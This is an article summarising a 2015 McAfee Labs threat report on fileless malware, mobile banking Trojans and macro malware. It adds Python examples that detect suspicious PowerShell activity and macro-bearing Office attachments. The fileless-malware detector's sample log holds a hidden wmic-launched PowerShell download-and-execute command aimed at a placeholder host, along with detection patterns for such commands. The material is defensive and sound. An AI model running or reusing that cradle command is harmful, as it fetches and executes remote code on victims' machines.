New forms of cyber attacks that can evade traditional threat detection are granting hackers access to critical information stored in personal computers and in the cloud, according to a new report.
McAfee Labs has released the quarterly McAfee Labs Threats Report: November 2015, which outlines developing cybersecurity threats, how they operate, and what steps consumers can take to avoid being affected by them.
The most recent report revealed three main dangers to sensitive consumer data: fileless malware, mobile banking Trojans, and macro malware. According to McAfee Labs, these threats emphasize just how quickly cybercriminals can adapt to new technologies while finding new ways to exploit old ones.
In the past, malware has always left behind a small binary somewhere on the disk, leaving a trace that could be found on the user's machine. Fileless malware, however, evades detection by reducing or eliminating the storage of binaries on disk. Although the security industry has been aware of fileless malware for many years, it became more prevalent in late 2014 and early 2015.
In the first three quarters of 2015, McAfee Labs detected 74,471 samples from three prominent fileless malware families: Kovter, Powelike, and SswKit. Presently, malware authors are capitalizing on Windows operating system applications, Windows Management Instrumentation, and Windows PowerShell to perform attacks that leave no trace on the disk, making it nearly impossible for users to discover any hidden threats.
Typically, malware enters a user’s system through email or a malicious website. While some endpoint security technology is smart enough to detect fileless malware, the best safety practices for users are safe browsing and smart email operations.
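Because the report describes fileless malware as living in PowerShell and Windows Management Instrumentation rather than on disk, the practical detection question for defenders is what such activity looks like in endpoint telemetry. The following is an added example, not code from the report or from McAfee Labs: it scores constructed command-line log entries (a simplified "timestamp | image | command line" format that stands in for process-creation or script-block logging) against a handful of well-known fileless indicators and decodes any base64-encoded PowerShell command so an analyst can read it. The indicator names, weights, threshold and log format are all assumptions made for the example.

```python
import base64
import re

# Constructed sample log lines (not taken from the report). The encoded
# command is a harmless string, base64-encoded the way PowerShell expects
# (UTF-16LE), so the decoder below has something realistic to unwrap.
BENIGN_ENCODED = base64.b64encode(
    "Write-Host 'inventory check'".encode("utf-16le")).decode()

SAMPLE_LOG = [
    "2015-11-02T09:14:03 | powershell.exe | powershell.exe -NoProfile "
    "-ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1",
    "2015-11-02T09:15:41 | powershell.exe | powershell.exe -NoProfile "
    f"-WindowStyle Hidden -EncodedCommand {BENIGN_ENCODED}",
    "2015-11-02T09:16:12 | wmic.exe | wmic process call create \"powershell "
    "-w hidden -c IEX (New-Object Net.WebClient)"
    ".DownloadString('http://example.invalid/x')\"",
    "2015-11-02T09:18:30 | powershell.exe | powershell.exe -Command "
    "\"Set-WmiInstance -Namespace root\\subscription "
    "-Class CommandLineEventConsumer -Arguments @{...}\"",
    "2015-11-02T09:20:00 | notepad.exe | notepad.exe C:\\Users\\alice\\notes.txt",
]

# Indicator -> (regex, weight). Weights are an assumption for this example:
# a hidden window alone is weak evidence, WMI event-subscription persistence
# and download-and-execute cradles are strong evidence.
INDICATORS = {
    "encoded_command": (re.compile(
        r"-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{20,})", re.IGNORECASE), 2),
    "hidden_window": (re.compile(r"-w(?:indowstyle)?\s+hidden", re.IGNORECASE), 1),
    "download_cradle": (re.compile(
        r"(?:IEX|Invoke-Expression).*DownloadString"
        r"|DownloadString.*(?:IEX|Invoke-Expression)", re.IGNORECASE), 3),
    "wmi_process_create": (re.compile(
        r"wmic\s+process\s+call\s+create|Win32_Process", re.IGNORECASE), 2),
    "wmi_subscription": (re.compile(
        r"root\\subscription|CommandLineEventConsumer|__EventFilter",
        re.IGNORECASE), 3),
}
ALERT_THRESHOLD = 3


def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument, or None.

    PowerShell encodes the argument as base64 over UTF-16LE text, which is
    why a plain base64 decode alone shows interleaved NUL bytes.
    """
    match = INDICATORS["encoded_command"][0].search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1)).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyse_line(line):
    """Split one log line and score its command line against INDICATORS."""
    timestamp, image, cmdline = (part.strip() for part in line.split("|", 2))
    hits = [name for name, (rx, _) in INDICATORS.items() if rx.search(cmdline)]
    score = sum(INDICATORS[name][1] for name in hits)
    return {
        "timestamp": timestamp,
        "image": image,
        "indicators": hits,
        "score": score,
        "decoded": decode_encoded_command(cmdline) if "encoded_command" in hits else None,
    }


def scan(lines, threshold=ALERT_THRESHOLD):
    """Return the analysed entries whose indicator score reaches the threshold."""
    results = (analyse_line(line) for line in lines)
    return [r for r in results if r["score"] >= threshold]


if __name__ == "__main__":
    for alert in scan(SAMPLE_LOG):
        print(alert["timestamp"], alert["image"], alert["indicators"], alert["decoded"])
```

Of the five constructed lines, the scheduled backup script and the notepad launch stay below the threshold, while the hidden encoded command, the WMI-launched download cradle and the WMI subscription are flagged. In a real deployment the same logic would run over PowerShell script-block logs or process-creation events rather than a hand-written list, and the weights would be tuned against the environment's normal administrative scripting.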
Mobile banking Trojans
According to McAfee Labs’ report, “Almost every mobile app is connected to the Internet, which increases the availability of data across devices and platforms. If the mobile device fails or the user replaces it, the app’s data can usually be restored from the cloud.”
“However,” the report added, “Remotely storing and managing mobile app data can be costly and time consuming. Instead of focusing solely on the development of the app itself, developers spend time and money building and testing the “back end” of the app in the cloud, which requires specific knowledge of databases and server-side languages.”
Cloud data storage has become essential to the way personal and application data is managed and protected, creating an emphasis on the security of data stored in the cloud. This has led major companies to focus on the “back-end” security of the cloud’s servers and databases.
Consequently, Internet companies such as Amazon, Google, and Facebook offer Backend-as-a-Service (BaaS) to provide secure data storage and management for mobile and web applications. However, McAfee Labs discovered that the implementation and configuration of those services by mobile app developers is often insecure.
Siegfried Rasthofer of the Technische Universität Darmstadt and Eric Bodden of Fraunhofer SIT, in collaboration with McAfee Labs, studied three chief BaaS providers: Facebook Parse, CloudMine, and Amazon AWS. The researchers discovered 56 million sets of unprotected data containing sensitive information, such as full names, email addresses, passwords, photos, money transactions, and health records. They determined that some application developers fail to follow the available security guidelines for BaaS, creating significant vulnerabilities.
Two main banking Trojan families were delineated in the study: Android/OpFake and Android/Marry, which relied primarily on sending SMS messages to perform financial fraud. During the two months that researchers analyzed these mobile banking Trojans, thousands of users—a majority located in Eastern Europe—were affected by them.
Researchers were able to study these Trojans because malware developers, like BaaS developers, are more focused on the functionality of applications as opposed to the security of those applications. Had the authors coded their malware appropriately, these Trojans would have been very difficult to study.
McAfee Labs recommends that users limit mobile app usage to well-known apps that have been validated for security by a trusted third party. Additionally, users should download mobile apps only from well-known app stores and avoid apps from unknown sources—including SMS messages and email. It is also recommended that users avoid rooting devices, so that malware cannot silently install apps.
Popular in the 1990s, macro malware is on the rise again. According to McAfee Labs, “Today’s macro malware developers are using common social engineering techniques to turn unwitting enterprise users into victims.”
Safe, legitimate macros are significant time-savers, providing a shortcut to automate a frequently performed task within applications such as Microsoft Word, the product in which macros are most heavily used. A macro can run automatically when the user performs an operation, such as starting Microsoft Word or opening a document.
While macros can be extremely helpful to the user, Word and Excel documents that combine macros with ordinary document text provide an open door for macro malware. According to the report, Microsoft Office programs have been popular targets of macro malware throughout the year, with Office macro threats at their highest level in six years.
Macro malware is spread using spam email campaigns, compromised web pages, and drive-by downloads. After download and execution, the malware acts as a normal file, remaining undetected.
McAfee Labs recommends that users take the following steps to combat macro malware attacks: enable automatic operating system updates, configure browser security settings to medium level or above, never open unsolicited emails or unexpected attachments, use updated Microsoft Office software, and ensure that the default setting for macro security on all Office products is set to high.
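The recommendation to keep Office macro security high works at the user's desk; a complementary check that a mail gateway or help desk can run is to ask the attachment itself whether it carries a VBA project, regardless of what its file name claims. The following is an added example, not code from the report or from McAfee Labs. It relies on the fact that Office 2007+ documents are ZIP containers in which VBA code is stored as a `vbaProject.bin` part declared with the `application/vnd.ms-office.vbaProject` content type, while legacy `.doc`/`.xls` files are OLE compound files identified by their eight-byte signature. The minimal containers built inside the example are constructed stand-ins for real attachments, and the verdict strings are assumptions made for the example.

```python
import io
import zipfile

# Signatures that are stable across Office versions.
OLE_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"   # legacy binary .doc/.xls/.ppt
ZIP_MAGIC = b"PK\x03\x04"                          # OOXML (.docx/.docm/.xlsx/.xlsm)
VBA_CONTENT_TYPE = b"application/vnd.ms-office.vbaProject"

# Extensions that are supposed to be macro-free; macros inside one of these
# is a mismatch worth a closer look.
MACRO_FREE_EXTENSIONS = (".docx", ".xlsx", ".pptx")


def build_sample_ooxml(with_macros):
    """Constructed minimal OOXML container standing in for a Word attachment.

    Real documents carry many more parts; only the pieces the classifier
    inspects are included. The vbaProject.bin contents are placeholder bytes,
    not a real VBA project.
    """
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        overrides = ['<Default Extension="xml" ContentType="application/xml"/>']
        if with_macros:
            overrides.append(
                '<Override PartName="/word/vbaProject.bin" '
                'ContentType="application/vnd.ms-office.vbaProject"/>')
            z.writestr("word/vbaProject.bin", b"\x00" * 16)
        z.writestr("[Content_Types].xml",
                   '<Types xmlns="http://schemas.openxmlformats.org/package/2006/content-types">'
                   + "".join(overrides) + "</Types>")
        z.writestr("word/document.xml", "<w:document/>")
    return buf.getvalue()


def classify(data):
    """Classify an attachment by content, never by file name.

    Returns one of: "ooxml-macros", "ooxml-clean", "legacy-ole", "not-office".
    A legacy OLE file may or may not contain VBA; deciding that requires
    parsing its internal streams, which this example leaves to a dedicated tool.
    """
    if data.startswith(OLE_MAGIC):
        return "legacy-ole"
    if not data.startswith(ZIP_MAGIC):
        return "not-office"
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as z:
            names = z.namelist()
            has_vba_part = any(n.lower().endswith("vbaproject.bin") for n in names)
            content_types = (z.read("[Content_Types].xml")
                             if "[Content_Types].xml" in names else b"")
    except zipfile.BadZipFile:
        return "not-office"
    # Either signal is enough: a stripped content-types file can hide the
    # declaration, and a renamed part can hide the file name.
    if has_vba_part or VBA_CONTENT_TYPE in content_types:
        return "ooxml-macros"
    return "ooxml-clean"


def triage(filename, data):
    """Combine the content verdict with the file name the sender chose."""
    verdict = classify(data)
    ext = filename.lower()[filename.rfind("."):] if "." in filename else ""
    return {
        "filename": filename,
        "verdict": verdict,
        "extension_mismatch": verdict == "ooxml-macros" and ext in MACRO_FREE_EXTENSIONS,
        "needs_review": verdict in ("ooxml-macros", "legacy-ole"),
    }


if __name__ == "__main__":
    for name, blob in [("quarterly.docx", build_sample_ooxml(False)),
                       ("invoice.docx", build_sample_ooxml(True)),
                       ("old_report.doc", OLE_MAGIC + b"\x00" * 504)]:
        print(triage(name, blob))
```

The check is deliberately content-based: a macro-enabled document renamed to `.docx` is reported both as carrying macros and as an extension mismatch, which is the kind of inconsistency the social-engineering campaigns described above depend on the recipient not noticing. Anything flagged `needs_review` is a candidate for quarantine or sandbox detonation rather than delivery to the user's inbox.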
As the proliferation of damaging cyberattacks continues to grow, users will become increasingly vulnerable the longer they wait to protect themselves. Regardless of the form of attack, the best practices for protecting critical data need to start with the user.